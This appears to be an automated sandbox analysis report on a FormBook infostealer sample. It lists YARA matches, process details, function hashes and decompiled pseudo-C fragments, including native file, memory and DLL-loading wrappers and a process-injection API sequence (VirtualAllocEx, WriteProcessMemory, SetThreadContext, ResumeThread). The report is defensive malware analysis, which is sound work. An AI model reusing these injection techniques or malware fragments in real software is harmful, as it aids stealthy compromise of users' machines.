Analysis Process: svchost.exe PID: 2608 Parent PID: 1764

General

Start time:	19:26:57
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0xa00000
File size:	20992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2224 Parent PID: 2828 vbc.exeCOMMON

Executed Functions

Function 001E6300, Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

@2l, xrefs: 001E650D
d, xrefs: 001E630D

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: @2l$d
API String ID: 0-321159049
Opcode ID: 46744bedd3e59b52cff735394cf39afbc0069909b3275431d6d5490a81e201da
Instruction ID: e4c70ac425cd2ce2677cd960c354ce0b8ee696fae73176e6643893e4806e0597
Opcode Fuzzy Hash: 46744bedd3e59b52cff735394cf39afbc0069909b3275431d6d5490a81e201da
Instruction Fuzzy Hash: 74618B74D0824CCFCB45EFB6E951A9EBBF3AB8A704F00D569D104DB664EB309906CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05290903, Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

$, xrefs: 052908AD
, xrefs: 05290968

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID: $$
API String ID: 0-182950533
Opcode ID: 3ecf3b344557873ff16ac9ac1e980724d096b20bb37e87c8831b6c9dce9c2471
Instruction ID: 8a4891170a8828743bb8764457b29ba39fe9aaee6ec0cd4ab301141711e491d8
Opcode Fuzzy Hash: 3ecf3b344557873ff16ac9ac1e980724d096b20bb37e87c8831b6c9dce9c2471
Instruction Fuzzy Hash: F231BF74E16228CFDB68DF65D988BD8BBB1BF4A301F1080D9D449A7251CB705AC5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 001ECF00, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ED1C7

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aa18acdb40303fd72a1513f4720d46b4c79bb5f4e1bfc061500739bc53e4424b
Instruction ID: 5b889b1728e59a090723d1cb264aad6d3b1e155864b240e1a830314c7574b5d3
Opcode Fuzzy Hash: aa18acdb40303fd72a1513f4720d46b4c79bb5f4e1bfc061500739bc53e4424b
Instruction Fuzzy Hash: C0C12470D0026D8FDF24DFA5C841BEEBBB1BB49304F1085A9E919B7240EB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 001ECB68, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001ECC3B

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 271d7cf05fa12cadada9c86599ef13ec2f4aef97ae92558cd8088920dbfee0c0
Instruction ID: b5960fc6924640c23dd73a17a975ea135173e79831e3fbaa7de3c96658544bb4
Opcode Fuzzy Hash: 271d7cf05fa12cadada9c86599ef13ec2f4aef97ae92558cd8088920dbfee0c0
Instruction Fuzzy Hash: 3741ABB4D012589FCF00CFA9D984ADEFBF1BB49304F20942AE819B7240D734AA55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001ECCC8, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001ECD7A

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bbe6d029d25b6d2d28dc58c146ff09218150e751c11dfb847fa7d146735a7425
Instruction ID: c296180e4aabacbca911af165ccab7079db59d4f15c85e14d2c2ae8fb0b93697
Opcode Fuzzy Hash: bbe6d029d25b6d2d28dc58c146ff09218150e751c11dfb847fa7d146735a7425
Instruction Fuzzy Hash: 164198B9D042589FCF00CFA9D884AEEFBB1BB49314F10942AE915B7240D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001ECA40, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001ECAEA

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 305c095ec4c09f9065620641b4d6d73e4bb9a8bbfa7a8c941c5a04b823893de5
Instruction ID: a70c262dc6099dbb8d5c33753d070f2f0f274408b40ac3c66ebe3224ce697977
Opcode Fuzzy Hash: 305c095ec4c09f9065620641b4d6d73e4bb9a8bbfa7a8c941c5a04b823893de5
Instruction Fuzzy Hash: 324199B8D042589FCF14CFA9D884A9EFBB1FB49314F10942AE815B7200E735A946CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 001EC910, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001EC9BF

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 03cdcdfd009f20466a9913f7660f233a3099cfc3c98bb22c01bd69e467beb091
Instruction ID: 11077f1303df5a866eb85980d8ee6dfc9c9ea6b8d825a5667a6f520af6bfa5cf
Opcode Fuzzy Hash: 03cdcdfd009f20466a9913f7660f233a3099cfc3c98bb22c01bd69e467beb091
Instruction Fuzzy Hash: 5241ACB5D002589FCB14CFA9D884AEEFBB1AF49314F24842AE415B7240D779A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EC820, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 001EC89E

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cae1dc7299f587c9c0e34a10ce083ac7b874d9615311e324a3c2192613a02eed
Instruction ID: 35e7e9e59323c1530c27a6c6c49d7cc0fa0e754369d629f120455ea87dbf3438
Opcode Fuzzy Hash: cae1dc7299f587c9c0e34a10ce083ac7b874d9615311e324a3c2192613a02eed
Instruction Fuzzy Hash: BD31A9B4D002189FCF14CFA9D984A9EFBB5EB49314F24942AE815B7300D735A905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 052906DF, Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

#, xrefs: 0529076D

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a9145a6a23fb63e040d3ff8e89a2ac847935bb8a7a146892fbfe9a4f2cccdeee
Instruction ID: 1f33ce5948ea5a1a7f600ccb03bfc3cbed9dc55693a6374f23478737c98e5684
Opcode Fuzzy Hash: a9145a6a23fb63e040d3ff8e89a2ac847935bb8a7a146892fbfe9a4f2cccdeee
Instruction Fuzzy Hash: 4D119375900228EFDB64CF94D998F99BBB2BB4D300F1481D9E509A7251C7319E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 05290457, Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

&, xrefs: 05290493

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: d80a0df3582368988b3bb1aa12f195228a87983dcad335c62a5e5c3d89f46850
Instruction ID: e009613bde739851341dc6d3711a2eee7685d9497d66a1546ca963b8b2730577
Opcode Fuzzy Hash: d80a0df3582368988b3bb1aa12f195228a87983dcad335c62a5e5c3d89f46850
Instruction Fuzzy Hash: C2F0DFB5910218EFDB14CF95D988FE9BBF9AB49314F108096E509E7280C771AB85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0017D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.462094560.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ae52aea7d117e1fe4af7d45ba107a5a274b57dce01b596cf42f9e95df67c62
Instruction ID: 24a671354c907a47056ac4395404379dea5f2ce9698f3c1ea007a3c82915310a
Opcode Fuzzy Hash: b4ae52aea7d117e1fe4af7d45ba107a5a274b57dce01b596cf42f9e95df67c62
Instruction Fuzzy Hash: 2B21F275608208DFCB14DF14E984B26BB75EF88314F34C569E90D4B246C33AD847CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0017D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.462094560.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84459dbb4ef35013e5e845c0f0fcbd43f61ca9de59ccf7ae52790c08fc7d7aee
Instruction ID: 804f782a56d9091adec02196ff82f50ebb8d2282e289f4fbf5926889ecd30438
Opcode Fuzzy Hash: 84459dbb4ef35013e5e845c0f0fcbd43f61ca9de59ccf7ae52790c08fc7d7aee
Instruction Fuzzy Hash: C4218B755093848FCB12CF20D994B15BF71EF46314F28C5EAD8498B2A7C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0016D3B9, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.462075997.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d668fb9aaae16c7b63c5f1a8b730b6595a21287556e31879a6d37e1f7cd2f86b
Instruction ID: ad25c7af9d01c54e2733efd7435e6ac85bca683c8ca65a206340fb235c0f4f99
Opcode Fuzzy Hash: d668fb9aaae16c7b63c5f1a8b730b6595a21287556e31879a6d37e1f7cd2f86b
Instruction Fuzzy Hash: 3E01F771A0C3549AD7108A25EC84B67BB98EF41324F29C416ED044B682D779AC54DAB2

Uniqueness

Uniqueness Score: -1.00%

Function 052909B3, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8775bcfb71419258f33ab27172c66829a60ba1d1acdae6045014391285268455
Instruction ID: 3a3f09a92cb9d7c47026d72f4ea112046414e71f85fed856585d4f9b1afe08a9
Opcode Fuzzy Hash: 8775bcfb71419258f33ab27172c66829a60ba1d1acdae6045014391285268455
Instruction Fuzzy Hash: 8E11C575D04228DFDB65DFA1CC94BDCBBB2BB49304F1080A9D109A72A1DB355E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0016D14B, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.462075997.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba31ab330eb9c2d801beed645ee0cbdd948fa4480d1e49f5f426aa6c9e7ca99
Instruction ID: 26448bdbefe7240b3dc096cb41f25274d13c717277601d1be52e5adb4c92cd3a
Opcode Fuzzy Hash: aba31ab330eb9c2d801beed645ee0cbdd948fa4480d1e49f5f426aa6c9e7ca99
Instruction Fuzzy Hash: F0F0F9B6600604AF97248F0ADC84C27FBA9EBD5770315C55AE8494B712C671EC51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0529019A, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb95fbeb59b1797119bec6486b6a05f423e4a3dc1ed35c2928ca3937bb6d4ee
Instruction ID: 63964e754ac65104bfa05b4c1e56d95a98b0dcaffa2406e4c0f8681522436171
Opcode Fuzzy Hash: fcb95fbeb59b1797119bec6486b6a05f423e4a3dc1ed35c2928ca3937bb6d4ee
Instruction Fuzzy Hash: 6801C578910228CFCB64DF60D9987D8BBB2BB49311F1081E98009A73A1DB349EC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0016D3B8, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.462075997.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd83635bce2541ca9821fa7a6ab59ebd0e2884859bf9dbdda48ed01de45ab95
Instruction ID: e3c45d7f989636647e967ca08ecba24966735c7396899c7683fde71b5a28830c
Opcode Fuzzy Hash: 8fd83635bce2541ca9821fa7a6ab59ebd0e2884859bf9dbdda48ed01de45ab95
Instruction Fuzzy Hash: BBF062715083449EE7108A15EC88B73FF98EF51724F28C55AED085B687C379AC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0016D13C, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.462075997.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d00d47ad4fd3ebdb5db43f236253d8d7c766460fc3bf9eb841213bc7b060fe7
Instruction ID: e2df8a3c2a060477cabf41bf30d160deee084225405fe4215bd379859e912293
Opcode Fuzzy Hash: 3d00d47ad4fd3ebdb5db43f236253d8d7c766460fc3bf9eb841213bc7b060fe7
Instruction Fuzzy Hash: 55F0E775104680AFD725CF06CC88C23BBB9EB8676072AC59EA8595B262C771EC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 052911B8, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdc935d63530ca3c8b85e69dfa7ca832bddf6540431101b7a3f123dd2cb9ed6
Instruction ID: d897bfd38acb4c395fdff89a9db1b9eadc2ece520f3fb1fdf10a03df565cdc4c
Opcode Fuzzy Hash: ecdc935d63530ca3c8b85e69dfa7ca832bddf6540431101b7a3f123dd2cb9ed6
Instruction Fuzzy Hash: 0EF06D74819249AFCB05CF94C9519DCBF71EF4A210F1484DAE84897362C3328A25EF41

Uniqueness

Uniqueness Score: -1.00%

Function 05290140, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57bbf251b9ba66378e9fe650ce8eac921a57fe32f38dc180fdbdd6925bb43a2b
Instruction ID: d645dad86bd95c599ccced3c5d1393ad96880b799bba881b9f23ec6134a1a20c
Opcode Fuzzy Hash: 57bbf251b9ba66378e9fe650ce8eac921a57fe32f38dc180fdbdd6925bb43a2b
Instruction Fuzzy Hash: 20F017B1A6421CEFDB24CF54DC85FD8B7B5AB59304F108495A249AB2C0C7B0AAC1CF24

Uniqueness

Uniqueness Score: -1.00%

Function 052912F0, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2690436975f5f14e0312d8ae063d8c848fd8046d3089210170ee977237d448fb
Instruction ID: 292c29a9465274cfcb4db6c8fe27a1a0c5d2d09c9cad164a99c0c4910a540ee4
Opcode Fuzzy Hash: 2690436975f5f14e0312d8ae063d8c848fd8046d3089210170ee977237d448fb
Instruction Fuzzy Hash: 3CF01C34D1A2889FCB05CBA4D8555ECFFB0EB4A204F2481EFC84997B52D6315A55CF81

Uniqueness

Uniqueness Score: -1.00%

Function 052911C8, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c308f439e1486cfeebd1cf7127bba5e7bdf24e089cabb5bc39ed55142abbda
Instruction ID: 23f405da08df2231a6cc234b4992ebf32518d8a4728b4f4207926fcec9af0994
Opcode Fuzzy Hash: 38c308f439e1486cfeebd1cf7127bba5e7bdf24e089cabb5bc39ed55142abbda
Instruction Fuzzy Hash: ADF0F238904208FBCB04CFD8D9409ACBBB6EB48300F108099A80853351C7729A21EB80

Uniqueness

Uniqueness Score: -1.00%

Function 05291300, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba561b3483cda1eba00882b74f8c1e4fea68e7242da0d4b66edf467c9593348
Instruction ID: 430cc44e123051b27d9bb67bfa85a7ef57b03de8193b35b0ee4cdc372ede3897
Opcode Fuzzy Hash: 9ba561b3483cda1eba00882b74f8c1e4fea68e7242da0d4b66edf467c9593348
Instruction Fuzzy Hash: 0CE01234D08208EBCB08DF98D541AACFBB5EB89204F2080AAD80893341C632AA12CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05290799, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703137a7d55c3882e9c5b895246a1dda4811780eee9f9f43465609459d34463c
Instruction ID: 8e31b5736ff45e551ba878d5bdfc02f098b34a0b4d0e3f71f70a6a9ff0c03a6f
Opcode Fuzzy Hash: 703137a7d55c3882e9c5b895246a1dda4811780eee9f9f43465609459d34463c
Instruction Fuzzy Hash: 8CF0A5749042288FCB24DF21E9546DCBBB2AB5A310F5081E9912AA72A0DB745EC5CF95

Uniqueness

Uniqueness Score: -1.00%

Function 052908D1, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.469449218.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a7ccc9638e3d4498df56c7bb6bac5d0765382165f2fe4fc04152c841e50e85
Instruction ID: 509d11c23c4068e2a1614e08058119887e8ab8c6275f11a3893b9e3a90a857f4
Opcode Fuzzy Hash: 16a7ccc9638e3d4498df56c7bb6bac5d0765382165f2fe4fc04152c841e50e85
Instruction Fuzzy Hash: 88E075B8815269CFDB28CF61D94C7D8BBB1AB55311F0091DA815A673A0D3B44AC5CF15

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001E1DE0, Relevance: 2.8, Strings: 2, Instructions: 319COMMON

Download Yara Rule

Strings

$5d, xrefs: 001E210F
h4d, xrefs: 001E1F24

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: $5d$h4d
API String ID: 0-117076261
Opcode ID: 1a9a1f72da11da23733ff166be713ebbda5345e3140a219a03751193cd457f5e
Instruction ID: 1424e41f330d70ccd3688d2bd46b6409b46182cb9cf12b30f93f7f3ef7d1649d
Opcode Fuzzy Hash: 1a9a1f72da11da23733ff166be713ebbda5345e3140a219a03751193cd457f5e
Instruction Fuzzy Hash: 24C10430A096C1DFC7158F6ADC64ABEBBB1EF45300F1981ABE555DB292C378CA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 001E6310, Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@2l, xrefs: 001E650D

Memory Dump Source

Source File: 00000004.00000002.462181680.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: @2l
API String ID: 0-805983724
Opcode ID: 1232132b538ac685e572becdd093bd8072eded856ca612887ce8525e18486a22
Instruction ID: 17e7cac8f6d2d09473d1274d8d3e1779124379feba7621f0228fe57b113c1f1e
Opcode Fuzzy Hash: 1232132b538ac685e572becdd093bd8072eded856ca612887ce8525e18486a22
Instruction Fuzzy Hash: 50513B74E0421CCFDB45EFA6E956B9EBBF3AB89704F00D529D104DB664EF3099068B90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 3008 Parent PID: 2224 vbc.exeCOMMON

Executed Functions

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186CD, 004186D4
r=A, xrefs: 004186B2, 004186C0
1:A, xrefs: 004186AC, 004186B8

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00000000
0x00409bb4
0x00409bba
0x00409b6e
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: 0a1b536bba40c6b6fce4d7236943077e65422b21d4ad40dbaff7467f6c4f6708
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: 370152B5D0010DB7DF10DAA1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("in al, dx");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187c2
0x004187c3
0x004187cf
0x004187d7
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
